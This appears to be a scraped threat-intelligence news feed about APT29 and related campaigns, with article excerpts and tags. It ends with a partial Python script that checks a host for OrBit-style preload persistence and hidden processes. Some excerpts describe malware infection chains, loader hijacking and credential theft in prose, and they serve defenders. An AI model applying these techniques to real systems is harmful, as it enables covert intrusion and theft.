An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors. The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock,
2023-08-17T15:09:00+00:00 https://thehackernews.com/2023/08/russian-hackers-use-zulip-chat-app-for.html www.secnews.physaphae.fr/article.php?IdArticle=8371161 False Malware,Threat APT 29 2.0000000000000000
knowbe4 - cybersecurity services Russian Hackers Breached Government Agencies' MFA Using Microsoft Teams: Is Your Business Next?
Microsoft's recent blog post raised eyebrows across the cybersecurity community. State-backed hackers linked to Russia, known as APT29 or Cozy Bear, have executed “highly targeted” phishing attacks through Microsoft's Teams platform. These are the same hackers behind the historic SolarWinds hack in 2020 and the 2016 breach of the Democratic National Committee. The method was both sophisticated and alarmingly simple. By compromising Microsoft 365 accounts owned by small businesses, the hackers created domains to deceive their targets through Microsoft Teams messages. They engaged users and elicited approval of MFA prompts, bypassing what is usually considered a robust security measure.
2023-08-06T14:22:10+00:00 https://blog.knowbe4.com/russian-hackers-breached-government-agencies-mfa-using-microsoft-teams-is-your-business-next www.secnews.physaphae.fr/article.php?IdArticle=8366414 False None APT 29,APT 29 4.0000000000000000
Netskope - Netskope is an American software company providing an IT security platform Cloud Threats Memo: Russian State-sponsored Threat Actors Increasingly Exploiting Legitimate Cloud Services
State-sponsored threat actors continue to exploit legitimate cloud services, and one group in particular, the Russian APT29 (also known as Cozy Bear, Cloaked Ursa, BlueBravo, Midnight Blizzard, and formerly Nobelium), seems to be especially active. Between March and May 2023, security researchers at Recorded Future's Insikt Group unearthed a cyber espionage campaign by the same […]
2023-08-04T16:48:11+00:00 https://www.netskope.com/blog/cloud-threats-memo-russian-state-sponsored-threat-actors-increasingly-exploiting-legitimate-cloud-services www.secnews.physaphae.fr/article.php?IdArticle=8365743 False Threat,Cloud APT 29,APT 29 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?) Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats
Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It's also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes.
2023-08-03T12:08:00+00:00 https://thehackernews.com/2023/08/microsoft-exposes-russian-hackers.html www.secnews.physaphae.fr/article.php?IdArticle=8365093 False Threat APT 29 2.0000000000000000
Recorded Future - Recorded Future feed Russian military hackers sent phishing lures masquerading as Microsoft Teams chats
Hackers within the Russian military used Microsoft Teams chats as phishing lures in “highly targeted social engineering attacks,” according to security officials at Microsoft. The tech giant said on Wednesday it uncovered a campaign by a prolific Russian hacking group it calls Midnight Blizzard but which is most commonly known as NOBELIUM, Cozy Bear or APT29.
2023-08-02T20:47:00+00:00 https://therecord.media/russian-hackers-sent-phishing-lures www.secnews.physaphae.fr/article.php?IdArticle=8364908 False None APT 29,APT 29 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?) BlueBravo Deploys GraphicalProton Backdoor Against European Diplomatic Entities
The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in
2023-07-28T14:24:00+00:00 https://thehackernews.com/2023/07/bluebravo-deploys-graphicalproton.html www.secnews.physaphae.fr/article.php?IdArticle=8362655 False None APT 29,APT 29 2.0000000000000000
Dark Reading - Informationweek Branch SolarWinds Attackers Dangle BMWs to Spy on Diplomats
Cloaked Ursa/Nobelium gets creative by appealing to the more personal needs of government employees on foreign missions in Kyiv.
2023-07-13T15:48:58+00:00 https://www.darkreading.com/endpoint/solarwinds-attackers-bmws-spy-diplomats www.secnews.physaphae.fr/article.php?IdArticle=8356067 False None APT 29 4.0000000000000000
AhnLab - Korean Security Firm Threat Trend Report on APT Groups – May 2023
The cases of major APT groups for May 2023 gathered from materials made public by security companies and institutions are as follows. – Agrius – Andariel – APT28 – APT29 – APT-C-36 (Blind Eagle) – Camaro Dragon – CloudWizard – Earth Longzhi (APT41) – GoldenJackal – Kimsuky – Lazarus – Lancefly – OilAlpha – Red Eyes (APT37, ScarCruft) – SideCopy – SideWinder – Transparent Tribe (APT36) – Volt Typhoon (Bronze Silhouette) ATIP_2023_May_Threat Trend Report on APT Groups_20230609
2023-07-07T02:33:29+00:00 https://asec.ahnlab.com/en/55184/ www.secnews.physaphae.fr/article.php?IdArticle=8353225 False Threat,Prediction APT 38,GoldenJackal,GoldenJackal,APT-C-36,APT 29,APT 29,APT 37,APT 37,Guam,Guam,APT 28,APT 28,APT 41,APT 36,APT 36,APT-C-17,APT-C-17 3.0000000000000000
Soc Radar - SOC-specialized blog Credential Theft Attacks Surge: Microsoft Raises Red Flag on Midnight Blizzard (APT29)
Microsoft has identified Midnight Blizzard, a Russian state-affiliated hacking group also known as APT29, as...
2023-06-27T08:30:52+00:00 https://socradar.io/credential-theft-attacks-surge-microsoft-raises-red-flag-on-midnight-blizzard-apt29/ www.secnews.physaphae.fr/article.php?IdArticle=8349658 False None APT 29 2.0000000000000000
Recorded Future - Recorded Future feed Kremlin-backed hacking group puts fresh emphasis on stealing credentials
Microsoft has detected an increase in credential-stealing attacks conducted by the Russian state-affiliated hacker group often labeled as APT29, Cozy Bear or Nobelium. These attacks are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries. Under Microsoft's new naming convention for advanced persistent threats (APTs), the company is calling
2023-06-21T20:21:00+00:00 https://therecord.media/nobelium-hacking-group-stealing-credentials www.secnews.physaphae.fr/article.php?IdArticle=8347838 False None APT 29 2.0000000000000000
Anomali - Firm Blog Anomali Cyber Watch: Cozy Bear Employs New Downloaders, RTM Locker Ransomware Seeks Privacy, Vice Society Automated Selective Exfiltration
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Cyber News and Threat Intelligence. QBot Banker Delivered Through Business Correspondence (published: April 17, 2023). In early April 2023, an increased volume of malspam using business-email thread hijacking was detected delivering the QBot banking trojan (QakBot, QuackBot, PinkSlipBot). The observed lures, in English, German, Italian and French, targeted various countries, the top three being Germany, Argentina and Italy, in that order. The attackers spoofed a name from the hijacked conversation to entice the target into opening an attached PDF file. The target is then presented with a button, a password and an instruction to download, unpack and run a malicious Windows Script File (WSF) inside a password-protected archive. User execution is followed by automated deobfuscation of an embedded JScript that produces an encoded PowerShell script, which downloads a QBot DLL from a compromised website and runs it with rundll32. QBot steals credentials, profiles systems to identify prospects for further high-value targeting, and steals locally stored emails for further proliferation through malspam thread hijacking.
Analyst Comment: Spoofing of the sender name from previous letters in the ‘From’ field can be identified in this campaign because it uses a fraudulent sender email address that differs from that of the real correspondent. Users should be cautious with password-protected archives and suspicious file types such as WSF. Network and host indicators associated with this QBot campaign are available in the Anomali platform and customers are advised to block them on their infrastructure. MITRE ATT&CK: [MITRE ATT&CK] T1566 - Phishing | [MITRE ATT&CK] T1204 - User Execution | [MITRE ATT&CK] T1207 - Rogue Domain Controller | [MITRE ATT&CK] T1140 - Deobfuscate/Decode Files or Information | [MITRE ATT&CK] T1059.001: PowerShell | [MITRE ATT&CK] T1218.011 - Signed Binary Proxy Execution: Rundll32 | [MITRE ATT&CK] T1090 - Proxy | [MITRE ATT&CK] T1114.001 - Email Collection: Local Email Collection
2023-04-18T17:14:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-employs-new-downloaders-rtm-locker-ransomware-seeks-privacy-vice-society-automated-selective-exfiltration www.secnews.physaphae.fr/article.php?IdArticle=8328981 False Ransomware,Malware,Tool,Threat APT 29,APT 29 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, no?) Russia-Linked Hackers Launches Espionage Attacks on Foreign Diplomatic Entities
The Russia-linked APT29 (aka Cozy Bear) threat actor has been attributed to an ongoing cyber espionage campaign targeting foreign ministries and diplomatic entities located in NATO member states, the European Union, and Africa. According to Poland's Military Counterintelligence Service and the CERT Polska team, the observed activity shares tactical overlaps with a cluster tracked by Microsoft as
2023-04-14T18:27:00+00:00 https://thehackernews.com/2023/04/russia-linked-hackers-launches.html www.secnews.physaphae.fr/article.php?IdArticle=8327789 False Threat APT 29 2.0000000000000000
Recorded Future - Recorded Future feed Kremlin-backed hackers blamed in spying campaign on EU and NATO diplomatic agencies
Russian state-affiliated hackers have launched a spying campaign targeting foreign ministries and diplomatic entities in NATO countries, the European Union, and, “to a lesser extent,” Africa, Poland's top cybersecurity agency said. The campaign is linked to the Kremlin-backed hacking group Nobelium, also known as APT29 or [BlueBravo](https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware), CERT.PL said in a [report](https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services) published Thursday with
2023-04-13T17:06:00+00:00 https://therecord.media/nobelium-apt29-russia-cyber-spying-campaign-targeting-nato-eu www.secnews.physaphae.fr/article.php?IdArticle=8327518 False None APT 29 2.0000000000000000
Soc Radar - SOC-specialized blog APT Profile: Cozy Bear / APT29
Advanced Persistent Threat (APT) groups are widely classified as organizations that lead “attacks on a...
2023-03-17T07:22:00+00:00 https://socradar.io/apt-profile-cozy-bear-apt29/ www.secnews.physaphae.fr/article.php?IdArticle=8319331 False Threat,Guideline APT 29,APT 29 2.0000000000000000
Recorded Future - Recorded Future feed Kremlin-backed hackers blamed in recent phishing attempts on EU agencies
A Russian state-backed hacker group known as Nobelium is behind recent attempted cyberattacks on diplomatic entities and government agencies in the European Union, cybersecurity researchers say. In a campaign identified in early March, the hackers sent phishing emails with content related to diplomatic relations between Poland and the U.S., according to a report by cybersecurity
2023-03-14T22:00:00+00:00 https://therecord.media/nobelium-apt29-cozy-bear-phishing-eu-ukraine www.secnews.physaphae.fr/article.php?IdArticle=8318651 False Hack APT 29 3.0000000000000000
SecurityWeek - Security News Russia-Linked APT29 Uses New Malware in Embassy Attacks
Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks.
2023-01-30T12:03:49+00:00 https://www.securityweek.com/russia-linked-apt29-uses-new-malware-in-embassy-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8305560 False Malware APT 29 2.0000000000000000
Global Security Mag - French news site Mustang Panda, APT29, APT36, Phobos, Cobalt Strike: Emerging cyberthreat actors are getting organized and ransomware is evolving
Malwares
2022-11-17T00:00:00+00:00 https://www.globalsecuritymag.fr/Mustang-Panda-APT29-APT36-Phobos-Cobalt-Strike-Les-acteurs-emergents-de-la.html www.secnews.physaphae.fr/article.php?IdArticle=8054151 False None APT 29,APT 36 None
Security Affairs - Security blog APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity.
The attack stands out for the use of the Windows Credential […]
2022-11-10T10:41:13+00:00 https://securityaffairs.co/wordpress/138322/apt/apt29-windows-credential-roaming.html www.secnews.physaphae.fr/article.php?IdArticle=7923274 False None APT 29 None
The Hacker News - The Hacker News is a hacking news blog (surprising, no?) APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network
2022-11-09T19:17:00+00:00 https://thehackernews.com/2022/11/apt29-exploited-windows-feature-to.html www.secnews.physaphae.fr/article.php?IdArticle=7905523 False None APT 29 None
Mandiant - Mandiant security blog They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming
2022-11-08T15:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming www.secnews.physaphae.fr/article.php?IdArticle=8377408 False None APT 29,APT 29 4.0000000000000000
CISCO Talos - Cisco Research blog The benefits of taking an intent-based approach to detecting Business Email Compromise
By Abhishek Singh.
BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets. A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge. Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit. Detection of exploitation techniques such as lookalike domains and any differences between the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent. The intent-based approach detects BEC and then classifies it by type of scam. It catches BEC messages irrespective of whether a threat actor is impersonating a C-level executive or any other employee in an organization. Classification by type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. This additional information further assists in designing better preventive features to stop BEC.
Business email compromise (BEC) is one of the most financially damaging online crimes. As per the Internet Crime 2021 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollar loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages.
Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC, from the simplistic through machine learning (ML) approaches.
Policy-based detection
The first place to start is with policy-based detection, as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email.
2022-10-18T08:41:18+00:00 http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html www.secnews.physaphae.fr/article.php?IdArticle=7540074 False Threat,Medical,Cloud APT 38,APT 19,APT 29,APT 10,APT 37,Uber,APT 15,Yahoo None
Anomali - Firm Blog Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence. LastPass Hackers Stole Source Code (published: August 26, 2022). In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn't seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment, since “white-box hacking” (when the source code of the attacked system is known) is easier for threat actors.
Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code
Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022). Starting in July 2022, a new campaign by the Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence, Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools to the startup folders and autostart extensibility point (ASEP) registry keys. Overall, the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomalies, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to the SysAidServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 |
2022-08-30T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-first-real-life-video-spoofing-attack-magicweb-backdoors-via-non-standard-key-identifier-lockbit-ransomware-blames-victim-for-ddosing-back-and-more www.secnews.physaphae.fr/article.php?IdArticle=6626943 False Ransomware,Hack,Tool,Vulnerability,Threat,Guideline,Cloud APT 29,APT 37,LastPass None
Global Security Mag - French news site The APT29 group continues to target Microsoft 365
Malwares
2022-08-26T10:36:26+00:00 http://www.globalsecuritymag.fr/Le-groupe-APT29-continue-de-cibler,20220826,129187.html www.secnews.physaphae.fr/article.php?IdArticle=6541176 False None APT 29 None
Security Affairs - Security blog Nobelium APT uses new Post-Compromise malware MagicWeb
Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments. The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […]
2022-08-25T17:11:38+00:00 https://securityaffairs.co/wordpress/134838/apt/nobelium-magicweb-tool.html www.secnews.physaphae.fr/article.php?IdArticle=6524118 False Malware,Threat APT 29 None
Bleeping Computer - American magazine Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows
2022-08-25T12:36:49+00:00 https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/ www.secnews.physaphae.fr/article.php?IdArticle=6523204 False Malware APT 29 3.0000000000000000
SecurityWeek - Security News Microsoft Details New Post-Compromise Malware Used by Russian Cyberspies
2022-08-25T10:16:06+00:00 https://www.securityweek.com/microsoft-details-new-post-compromise-malware-used-russian-cyberspies www.secnews.physaphae.fr/article.php?IdArticle=6518394 False Malware,Tool APT 29 None
Security Affairs - Security blog Russia-linked Cozy Bear uses evasive techniques to target Microsoft 365 users
Russia-linked APT group Cozy Bear continues to target Microsoft 365 accounts in NATO countries for cyberespionage purposes. Mandiant researchers reported that the Russia-linked Cozy Bear cyberespionage group (aka APT29, CozyDuke, and Nobelium) has targeted Microsoft 365 accounts in espionage campaigns. The experts pointed out that APT29 devised new advanced tactics, techniques, and procedures to evade detection.
[…] ]]> 2022-08-19T23:20:33+00:00 https://securityaffairs.co/wordpress/134609/apt/cozy-bear-targets-microsoft-365-users.html www.secnews.physaphae.fr/article.php?IdArticle=6422306 False None APT 29 None Bleeping Computer - Magazine Américain Russian APT29 hackers abuse Azure services to hack Microsoft 365 users 2022-08-19T11:10:55+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-abuse-azure-services-to-hack-microsoft-365-users/ www.secnews.physaphae.fr/article.php?IdArticle=6415346 False Hack APT 29 None Mandiant - Blog Sécu de Mandiant Vous ne pouvez pas m'auditer: APT29 continue de cibler Microsoft 365<br>You Can\\'t Audit Me: APT29 Continues Targeting Microsoft 365 Parrainé par le Foreign Intelligence Service (SVR).Mandiant continue d'identifier les opérations APT29 ciblant les intérêts des États-Unis et les pays des États-Unis et ceux des pays de l'OTAN et des pays partenaires.Malgré la publication de multiples opérations APT29, ils continuent d'être extrêmement prolifiques.En 2022, APT29 s'est concentré sur les organisations responsables de l'influence et de l'élaboration de la politique étrangère des pays de l'OTAN.Cela a inclus plusieurs cas où APT29 a revisité les victimes qu'ils avaient compromis des années
APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). Mandiant continues to identify APT29 operations targeting the United States\' (US) interests, and those of NATO and partner countries. Despite the publicization of multiple APT29 operations, they continue to be extremely prolific. In 2022, APT29 has focused on organizations responsible for influencing and crafting the foreign policy of NATO countries. This has included multiple instances where APT29 revisited victims they had compromised years]]>
2022-08-18T09:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft www.secnews.physaphae.fr/article.php?IdArticle=8377438 False None APT 29,APT 29 4.0000000000000000
Anomali - Firm Blog
Anomali Cyber Watch: Cozy Bear Abuses Google Drive API, Complex Lightning Framework Targets Linux, Google Ads Hide Fraudulent Redirects, and More
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware (published: July 21, 2022)
Intezer researchers discovered a new Linux malware called Lightning Framework (Lightning). It is a modular framework able to install multiple types of rootkits and to run various plugins. Lightning has passive and active capabilities for communication with the threat actor, including opening an SSH service via an OpenSSH daemon, and a polymorphic command and control (C2) configuration. Lightning is a newly discovered threat, and there is no information about its use in the wild or the actors behind it.
Analyst Comment: Defenders should block known Lightning indicators and monitor for file creation that follows the Lightning naming convention.
MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Network Sniffing - T1040 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: Lightning Framework, Linux, Lightning.Downloader, Lightning.Core, Typosquatting, Masquerading, Timestomping, Port:33229
Google Ads Lead to Major Malvertising Campaign (published: July 20, 2022)
Malwarebytes researchers discovered a malvertising campaign abusing Google Search advertisements for popular keywords such as “amazon,” “fac
2022-07-26T17:10:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-abuses-google-drive-api-complex-lightning-framework-targets-linux-google-ads-hide-fraudulent-redirects-and-more
Tags: Malware, Tool, Threat, Guideline. Actors: APT 29.

IT Security Guru - Security blog
Russian Adversaries Target Google Drive and DropBox in Latest Campaign
2022-07-21T10:13:51+00:00 https://www.itsecurityguru.org/2022/07/21/russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign
Tags: Malware, Threat. Actors: APT 29.

The Hacker News - The Hacker News is a hacking news blog (surprising, right?)
Russian Hackers Using DropBox and Google Drive to Drop Malicious Payloads
2022-07-19T21:03:48+00:00 https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html
Actors: APT 29.

Security Affairs - Security blog
Russia-linked APT29 relies on Google Drive, Dropbox to evade detection
Russia-linked threat actor APT29 is using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, which they track as Cloaked Ursa, started using Google Drive to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […]
2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html
Tags: Threat. Actors: APT 29.

Global Security Mag - French news site
Russian APT29 hackers use the online storage services Dropbox and Google Drive (Malwares)
2022-07-19T11:00:58+00:00 http://www.globalsecuritymag.fr/Les-pirates-russes-APT29-utilisent,20220719,128061.html
Actors: APT 29.

CyberScoop - scoopnewsgroup.com special Cyber
Russian hacking unit Cozy Bear adds Google Drive to its arsenal, researchers say
APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said.
2022-07-19T10:00:00+00:00 https://www.cyberscoop.com/apt29-google-drive-malware-spearphishing/
Actors: APT 29.

Anomali - Firm Blog
Anomali Cyber Watch: Brute Ratel C4 Framework Abused to Avoid Detection, OrBit Kernel Malware Patches Linux Loader, Hive Ransomware Gets Rewritten, and More
Trending Cyber News and Threat Intelligence
Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022)
SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email carrying Microsoft Office maldocs built with the Royal Road malicious document builder; these maldocs drop the Bisonal backdoor remote access trojan (RAT). Besides the targeted Russian organizations, the same attackers continue to target other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut).
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798
OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022)
Intezer researchers describe a new Linux malware dubbed OrBit that was fully undetected at the time of discovery. The malware hooks libc functions and gets loaded into every running process, but unlike previously described Linux threats it does not rely on the LD_PRELOAD environment variable. Instead it achieves persistence by adding the path of its shared object to /etc/ld.so.preload and by patching the binary of the dynamic loader itself so that the loader pulls in the malicious shared object. OrBit establishes an SSH connection, then stages and exfiltrates stolen credentials. It evades detection by hooking the functions that enumerate running processes and network connections and filtering their output, so any tool that goes through the hooked libc does not see it.
Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security tooling as statically linked executables, which do not go through the dynamic loader or the hooked libc at all.
MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 |
2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more
Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Patching. Actors: APT 29.

The Register - British news site
Near-undetectable malware linked to Russia's Cozy Bear
2022-07-06T05:27:10+00:00 https://go.theregister.com/feed/www.theregister.com/2022/07/06/brc4_state_sponsored_apt29/
Tags: Malware, Tool, Threat. Actors: APT 29.

Anomali - Firm Blog
Anomali Cyber Watch: Moshen Dragon Abused Anti-Virus Software, Raspberry Robin Worm Jumps from USB, UNC3524 Uses Internet-of-Things to Steal Emails, and More
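Added example for the OrBit item above (Intezer, July 6): this is the editor's code, not Intezer's or Anomali's. It turns the three observations in that write-up (an entry in /etc/ld.so.preload, a patched dynamic loader, and process listings filtered by a hooked libc) into host triage checks. Assumptions not taken from the article: the host runs glibc, whose loader carries the literal string "/etc/ld.so.preload" so that a loader patched to read a different preload file no longer contains it; the loader path is the x86-64 one and may need adjusting; and the preload file content, loader bytes and PID sets used in the samples are constructed, not real artifacts.

```python
"""Host triage for OrBit-style userland persistence (editor's added example).

Each check is a pure function over data so it can run on collected
artifacts; main() applies them to a live Linux host.
"""
import os

PRELOAD_FILE = "/etc/ld.so.preload"
LOADER_PATH = "/lib64/ld-linux-x86-64.so.2"        # assumption: adjust per distro/arch
PRELOAD_LITERAL = PRELOAD_FILE.encode() + b"\x00"  # NUL-terminated, as stored in glibc's ld.so


def parse_ld_so_preload(text):
    """Shared objects named in an ld.so.preload file. glibc reads the file as
    whitespace-separated names and ignores text after '#'."""
    entries = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries


def suspicious_preload_entries(entries, allowlist=()):
    """Every entry not on an explicit allowlist. On a typical host the file
    should not exist at all, so the empty default allowlist is deliberate."""
    allowed = set(allowlist)
    return [e for e in entries if e not in allowed]


def loader_is_patched(loader_bytes):
    """True when the loader image no longer carries the /etc/ld.so.preload
    literal (assumption: a patch that redirects the preload file replaces it).
    Quick triage only; also verify the file against your package manager."""
    return PRELOAD_LITERAL not in loader_bytes


def hidden_pids(listed, alive):
    """PIDs that answer kill(pid, 0) but are missing from the /proc listing.
    A hooked readdir() hides from ps, ls /proc and os.listdir alike; the
    signal probe never goes through readdir()."""
    return set(alive) - set(listed)


def listed_pids_from_proc():
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}


def alive_pids_by_probe(max_pid):
    """Brute-force existence probe; takes a few seconds at pid_max=4194304.
    Thread IDs answer kill() too, so main() checks each candidate's Tgid."""
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)              # signal 0: existence check only
        except ProcessLookupError:       # ESRCH: no such process
            continue
        except PermissionError:          # EPERM: exists, owned by someone else
            pass
        alive.add(pid)
    return alive


def is_thread_group_leader(pid):
    """True/False from /proc/<pid>/status; None if it cannot be read (a hooked
    open() may refuse, so callers keep such PIDs as candidates)."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return None
    return None


def triage(preload_text, loader_bytes, listed, alive, allowlist=()):
    """Run the three checks over supplied data and return the findings."""
    return {
        "preload_entries": suspicious_preload_entries(parse_ld_so_preload(preload_text), allowlist),
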